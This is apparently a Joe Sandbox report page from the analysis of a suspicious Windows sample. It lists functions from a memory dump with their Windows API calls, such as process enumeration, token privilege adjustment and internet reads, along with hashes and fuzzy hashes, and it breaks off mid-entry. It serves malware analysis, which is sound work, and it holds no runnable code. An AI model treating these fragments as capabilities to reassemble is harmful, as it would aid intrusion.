Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: 93fb50a3ec692f042bdde90b3b4d7fdbf24f0c5cac6dd530c2f2157e63ee63dc
Instruction ID: 7322f6f3a92052ab73e2b4e61a58fc15a07dba239a3b896ae1e44035c522e1d3
Opcode Fuzzy Hash: 93fb50a3ec692f042bdde90b3b4d7fdbf24f0c5cac6dd530c2f2157e63ee63dc
Instruction Fuzzy Hash: DA516B71504705EFD310EF24CC89EABB7E8EF98710F50482DF595962A2EB74E904CB92

Function 007CC498 Relevance: 6.1, APIs: 4, Instructions: 83nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

GetCursorPos.USER32(?), ref: 007CC4D2
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0077B9AB,?,?,?,?,?), ref: 007CC4E7
GetCursorPos.USER32(?), ref: 007CC534
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,0077B9AB,?,?,?), ref: 007CC56E

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: eb35a7eb2b6db90277eccf1f9e4eff2242ceca3fc4bcd59502e9a22fd329ed26
Instruction ID: 3ea6659dd99f0de1d41bbd43ed54ec0be6850a48dd6dd6838ed36af90f0d85c2
Opcode Fuzzy Hash: eb35a7eb2b6db90277eccf1f9e4eff2242ceca3fc4bcd59502e9a22fd329ed26
Instruction Fuzzy Hash: 85319535500458EFCB168F58D858EAB7BB5FB09310F54806DFA09872A1C739AD61DFA4

Function 00741290 Relevance: 6.1, APIs: 4, Instructions: 59nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 007412D8
GetClientRect.USER32(?,?), ref: 0077B5FB
GetCursorPos.USER32(?), ref: 0077B605
ScreenToClient.USER32(?,?), ref: 0077B610

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
String ID:
API String ID: 1010295502-0
Opcode ID: 5af58e5dc72b803413f06d11d2eec8f53076fe38cd24f54f08a5f81bbd29eac2
Instruction ID: 9ca8100086cd8539cd00826d55551df9683a916cd2ba9e51aebb009f49430e47
Opcode Fuzzy Hash: 5af58e5dc72b803413f06d11d2eec8f53076fe38cd24f54f08a5f81bbd29eac2
Instruction Fuzzy Hash: 7B111635600119EFCB00EF98D889DAE77B9FB05301F80446AFA01E7141D778AA91CBA9

Function 007CC57D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,0077B93A,?,?,?), ref: 007CC5F1

Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 007CC5D7

Strings

@U=u, xrefs: 007CC5D7

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID: @U=u
API String ID: 1273190321-2594219639
Opcode ID: 95cdab36cbd716055acbd530d094ebfd935962f4af0e1410c9cb19b0cd2609f1
Instruction ID: 2cf1eda962551e63b0417d65ca2ee35605a2b0ba07e3c0d2e1db731996348944
Opcode Fuzzy Hash: 95cdab36cbd716055acbd530d094ebfd935962f4af0e1410c9cb19b0cd2609f1
Instruction Fuzzy Hash: 0201B531200204EFCB225F54EC48F6B7BA6FB85364F14412CFA551B2E1CB35A862DB61

Function 007B22EE Relevance: 4.7, APIs: 3, Instructions: 164networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,007B180A,00000000), ref: 007B23E1
InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 007B2418

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Internet$AvailableDataFileQueryRead
String ID:
API String ID: 599397726-0
Opcode ID: 54a77fb9a6a67ee811cffa8d77ccb4eb411af2812470eee0d1f981363b36ec42
Instruction ID: 68b3d7f4dddf01a1fa0d34b2ecfa2fef70460b04b9ecef8fcc0c97971b4703cd
Opcode Fuzzy Hash: 54a77fb9a6a67ee811cffa8d77ccb4eb411af2812470eee0d1f981363b36ec42
Instruction Fuzzy Hash: 4841E271A05209FFEB109E95DC85FFBB7ECEB40714F10402AFA01A7542DA7D9E429660

Function 007AB333 Relevance: 4.6, APIs: 3, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007AB343
GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 007AB39D
SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 007AB3EA

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ErrorMode$DiskFreeSpace
String ID:
API String ID: 1682464887-0
Opcode ID: 779c6dbb766727ce555e291477d00b4f8a1bbe947c3491e14a71b39d4a599d8b
Instruction ID: 0ca051157fce491915e0c80c72cd779ca872b1d9e89287c13f36f1f73e4160d6
Opcode Fuzzy Hash: 779c6dbb766727ce555e291477d00b4f8a1bbe947c3491e14a71b39d4a599d8b
Instruction Fuzzy Hash: F6217135A00108EFCF00EFA5D885EEEBBB9FF49310F1481A9E905AB351CB35A915CB54

Function 007987E1 Relevance: 4.6, APIs: 3, Instructions: 67COMMON

Download Yara Rule

APIs

Part of subcall function 00760DB6: std::exception::exception.LIBCMT ref: 00760DEC
Part of subcall function 00760DB6: __CxxThrowException@8.LIBCMT ref: 00760E01

LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079882B
AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00798858
GetLastError.KERNEL32 ref: 00798865

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
String ID:
API String ID: 1922334811-0
Opcode ID: 40ed23876d7ca0f0232a4c273d6c01d448bd761bf1caf50290fe36e92d3da067
Instruction ID: c842017cd59044a7cae4dcd2ab1602335838b0c195be7659cf9f6b9ddb508433
Opcode Fuzzy Hash: 40ed23876d7ca0f0232a4c273d6c01d448bd761bf1caf50290fe36e92d3da067
Instruction Fuzzy Hash: 94118FB2514204AFEB18EFA4EC85D6BB7F9EB45710B20852EF45697241EB38BC408B60

Function 0079874B Relevance: 4.5, APIs: 3, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00798774
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0079878B
FreeSid.ADVAPI32(?), ref: 0079879B

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: 7f03769212c986dfa753919224f7f494ec9a13f08c24ce1be1e6f5273c7ba2c0
Instruction ID: a83dd7be8b6aee238d9992c7745237ba6c38bc8af6fc78726f99b292adb55357
Opcode Fuzzy Hash: 7f03769212c986dfa753919224f7f494ec9a13f08c24ce1be1e6f5273c7ba2c0
Instruction Fuzzy Hash: 82F04975A1130CBFDF00DFF4DC89EAEBBBDEF08601F1084A9E901E2181E6756A448B54

Function 007A4C7F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 007A4CB3

Strings

DOWN, xrefs: 007A4C98

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: mouse_event
String ID: DOWN
API String ID: 2434400541-711622031
Opcode ID: 092f902ef54f80713ef505f8b8ec33f032ac90b16485d42e9df6fd706257138b
Instruction ID: d4649b27604b58c47654b175bf61c43b22ade4af30fc686bdf66ea87f2fb7c16
Opcode Fuzzy Hash: 092f902ef54f80713ef505f8b8ec33f032ac90b16485d42e9df6fd706257138b
Instruction Fuzzy Hash: 7FE0867619D7227DB9442518BC0BEB7034C8B933317500226FD14E51C2ED8E1C8324B8

Function 007416DE Relevance: 3.1, APIs: 2, Instructions: 83nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623

Part of subcall function 007425DB: GetWindowLongW.USER32(?,000000EB), ref: 007425EC

GetParent.USER32(?), ref: 0077B7BA
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,007419B3,?,?,?,00000006,?), ref: 0077B834

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: 3fbc2e36fef7fbad188bc9123b7290e6aa8f45af9391e7893bad3fa0da7c0683
Instruction ID: 88113229e61cd4ddbd883c555ac606fcd450ea505ec3073876d6f3501fe3b5d1
Opcode Fuzzy Hash: 3fbc2e36fef7fbad188bc9123b7290e6aa8f45af9391e7893bad3fa0da7c0683
Instruction Fuzzy Hash: 2321D834201108AFCF159F28CC88EAA3B96EF49360F948254F5299B2F2C7355D52DB50

Function 007AC6D1 Relevance: 3.1, APIs: 2, Instructions: 52fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 007AC6FB
FindClose.KERNEL32(00000000), ref: 007AC72B

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 4c0adb5847e2679387db8e979fc5f1c62419fb5d15a313b43aa28d79b5543ffb
Instruction ID: 1726a76f94064e600bf2c5a2f5c8e65033d6df727e445d48fc5ad070cc48ae8d
Opcode Fuzzy Hash: 4c0adb5847e2679387db8e979fc5f1c62419fb5d15a313b43aa28d79b5543ffb
Instruction Fuzzy Hash: 231161726006049FDB10DF29D849A2AF7E9FF85324F00861DF9A9D7291DB34AC05CF81

Function 007CC93E Relevance: 3.0, APIs: 2, Instructions: 33nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 007CC961
NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,0077BA16,?,?,?,?,?), ref: 007CC98A

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: 2d5b565be2fb930982fdf9f9637ef1d79c119bc6fb8c14042b07806b758ca2d5
Instruction ID: 8f40e0e0dd5dfa167edd9d6c3ec7279c0f8a1fce63d16cb3c89ced581768e742
Opcode Fuzzy Hash: 2d5b565be2fb930982fdf9f9637ef1d79c119bc6fb8c14042b07806b758ca2d5
Instruction Fuzzy Hash: F2F03A7240021CFFEF058F85DC09EAE7BB9FB48311F00816EF905A2161D3756A60EBA4

Function 007AA06A Relevance: 3.0, APIs: 2, Instructions: 31windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,007B9468,?,007CFB84,?), ref: 007AA097
FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,007B9468,?,007CFB84,?), ref: 007AA0A9

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 640520fce32827af2fc6c2a98581d5745be5cfd085b22a0942dd0a8d08435807
Instruction ID: 80a6c4d5c8980c42eedb7ae8aa2d0856fd4cbaa76cd05a737f8e1fd6780bd1fe
Opcode Fuzzy Hash: 640520fce32827af2fc6c2a98581d5745be5cfd085b22a0942dd0a8d08435807
Instruction Fuzzy Hash: C1F0823550522DBBDB61AFA4CC48FEA776DBF09361F008269F909D6181D7349940CBA1

Function 007CCA7C Relevance: 3.0, APIs: 2, Instructions: 23nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 007CCA84
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,0077B995,?,?,?,?), ref: 007CCAB2

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: DialogLongNtdllProc_Window
String ID:
API String ID: 2065330234-0
Opcode ID: c073324524c3d87d59a373c4d08e867858369f7ddaac0b4e7dca9ca899b4419d
Instruction ID: d84a9ccfac191a7aa6cb8673d5b4e4b2fabf51ec9c0b09fb466cc4af6e0d01b2
Opcode Fuzzy Hash: c073324524c3d87d59a373c4d08e867858369f7ddaac0b4e7dca9ca899b4419d
Instruction Fuzzy Hash: FCE04F70140218BBEB159F19DC1AFBE3B54EB04751F40C11EF95AD91E1C67498509764

Function 007981CB Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00798309), ref: 007981E0
CloseHandle.KERNEL32(?,?,00798309), ref: 007981F2

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: AdjustCloseHandlePrivilegesToken
String ID:
API String ID: 81990902-0
Opcode ID: 9aeee1e2d8dcca7e688b171d03c9668e5e943550d352f4870b664cc1d98a0c65
Instruction ID: d7b46a3039f902699532a9b7ceceaf9c3da5f423b38266ea8eba1e2f3873eba6
Opcode Fuzzy Hash: 9aeee1e2d8dcca7e688b171d03c9668e5e943550d352f4870b664cc1d98a0c65
Instruction Fuzzy Hash: A5E0B672010A20EFEB252B70EC09D777BAAEB04310714882EF8A684471DB66AC91DB54

Function 0076A155 Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,007D4178,00768D57,t of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.,?,?,00000001), ref: 0076A15A
UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0076A163

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000080D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.000000000084F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395840812.0000000000855000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395866540.0000000000856000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_28uMwHvbTD.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: eb374efd2ab099b5b5b5a2ea54dd17004bfcdd9d8d0be2b8f05e308f435f587c
Instruction ID: 1efdfeaed302e4e85d56b87a2c369ea146a2e9ada2255a515f359cda565f44b8
Opcode Fuzzy Hash: eb374efd2ab099b5b5b5a2ea54dd17004bfcdd9d8d0be2b8f05e308f435f587c
Instruction Fuzzy Hash: 71B09231054248BBCA002B91EC09F883F6AEB84AA2F408024FA0D84060CB6656508A99

Function 0076F1D9 Relevance: 2.1, APIs: 1, Instructions: 645COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1395603409.0000000000741000.00000040.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1395578441.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1395603409.00000000007FE000.00000040.00000001.01000000.00000003.sdmpDownload File
